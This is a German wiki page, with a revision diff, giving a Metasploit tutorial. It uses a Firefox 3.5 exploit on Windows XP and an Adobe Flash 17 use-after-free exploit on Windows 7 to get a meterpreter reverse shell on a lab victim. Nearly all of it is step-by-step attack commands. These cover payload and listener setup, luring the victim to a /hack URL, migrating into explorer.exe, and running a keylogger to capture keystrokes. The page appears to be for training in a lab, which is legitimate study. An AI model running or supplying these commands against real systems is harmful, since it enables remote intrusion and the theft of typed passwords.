Metasploit: Unterschied zwischen den Versionen

Aus Xinux Wiki
Zur Navigation springen Zur Suche springen
Zeile 80: Zeile 80:
 
*gehen mit win7 auf http://192.168.244.150:8080/hack
 
*gehen mit win7 auf http://192.168.244.150:8080/hack
  
 
+
sessions -l (listet die sessions)
  sessions - i 1 (in die session gehen)
+
  sessions -i 1 (in die session gehen)
 
  sessions -h (zeigt optionen)
 
  sessions -h (zeigt optionen)
 
  ps (zeigt prozesse)
 
  ps (zeigt prozesse)

Version vom 20. Oktober 2015, 10:10 Uhr

Links

Setup Opfer

Winxp Service pack 3 Firefox 3.5

Setup Hacker

Kali Linux ip: 192.168.242.53

vorgehen

starte metasploit

msfconsole
use exploit/multi/browser/firefox_escape_retval
set payload windows/meterpreter/reverse_tcp/
set lhost 192.168.242.53 (lokaler Host)
set svrhost 192.168.242.53 (HTTP-Server IP)
set svrport 8888 (HTTP-Server Port)
set lport 4444 (lokaler Port)
set uripath /hack (optional)
exploit
jetzt muss das opfer mit dem fierfox diese url aufrufen http://192.168.242.53:8888/hack
wenn wir meterpreter > sehen hat der exploit funktioniert 
session - i 1 (in die session gehen)
sessions -h (zeigt optionen)
ps (zeigt prozesse)
migrate PSID (verschiebt in den prozess Z.b explorer.exe)
getpid (zeigt momentanen prozess)
keyscan_start (startet den keyloger)
keyscan_dump (zeigt aufzeichnungen)
keyscan_stop (stopt keyloger)

https://fpdownload.macromedia.com/pub/flashplayer/installers/archive/fp_18.0.0.203_archive.zip

https://fpdownload.macromedia.com/pub/flashplayer/installers/archive/fp_17.0.0.134_archive.zip


Win7 32bit Exploit

  • Setup Opfer

win732 bit

adobeflash 17.0.0.134

firefox

TeamViewer ID 597 708 786

Hackersystem

kali linux

ip 192.168.244.50

auf der konsole

metasploit konsole starten

  • msfconsole

auswahl des exploits

  • use exploit/windows/browser/adobe_flash_domain_memory_uaf

auswahl der schadsoftware

  • set payload windows/meterpreter/reverse_tcp

setzen des localhost

  • set lhost 192.168.244.50

setzen des webservers

  • set srvhost 192.168.244.50

pfad zum hack

  • set uripath /hack

ausführen des exploits

  • exploit

auf dem opfer

sessions -l (listet die sessions)
sessions -i 1 (in die session gehen)
sessions -h (zeigt optionen)
ps (zeigt prozesse)
migrate PSID (verschiebt in den prozess Z.b explorer.exe)
getpid (zeigt momentanen prozess)
keyscan_start (startet den keyloger)
keyscan_dump (zeigt aufzeichnungen)
keyscan_stop (stopt keyloger)